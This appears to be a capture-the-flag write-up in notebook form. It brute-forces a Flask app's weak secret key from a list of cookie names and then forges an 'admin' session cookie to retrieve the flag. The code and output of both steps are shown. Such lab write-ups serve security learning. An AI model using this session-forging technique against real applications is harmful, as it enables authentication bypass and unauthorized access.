First, from the `server.py` file, we notice that the secret key used by the app is one of the cookie names provided.  
That means we can brute force the process of finding it, which we can then use to forge the "admin" cookie, which we can't naturally generate in the app because it is not in the list of cookie names.  

To start, we grab a valid cookie from the web app (we can use inspect element to do that, or a tool like BurpSuite), and try to decrypt the cookie session name using the cookie names as possible secret keys:

In [7]:
from flask import Flask, session, make_response
from flask.sessions import SecureCookieSessionInterface
from itsdangerous import BadSignature, SignatureExpired

# Got this cookie using snickerdoodle as cookie name
cookie_value = "eyJ2ZXJ5X2F1dGgiOiJzbmlja2VyZG9vZGxlIn0.aHF2iw.gTUdy2WBUf105p-hWZXRS0Dogcc"
candidates = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]

app = Flask(__name__)
session_if = SecureCookieSessionInterface()

for key in candidates:
    app.secret_key = key
    serializer = session_if.get_signing_serializer(app)
    try:
        data = serializer.loads(cookie_value)
        print(f"Secret_key = {key!r}")
        print("Session data:", data)
        break
    except BadSignature:
        pass
    except SignatureExpired:
        pass
else:
    print("None of the candidate keys matched.")



Secret_key = 'fortune'
Session data: {'very_auth': 'snickerdoodle'}


So now we know the secret key.  
All that is left is to forge a fake session with the cookie name of "admin", and w.e can get the flag

In [8]:
app.secret_key = "fortune"

with app.test_request_context("/"):
    session["very_auth"] = "admin"
    resp = make_response("OK")

    app.session_interface.save_session(app, session, resp)

    # Just tyding up the output
    set_cookie = resp.headers.get("Set-Cookie")
    session_name = set_cookie.split(';', 1)[0].split('=', 1)[1]

    print(session_name)

eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.aHF3oQ.s_y7WRvVSeiXE4-hB910B4vfD9k


And there we have it. Now we just need to exchange our session cookie in the browser with this one and acces the /display subdomain to get the flag.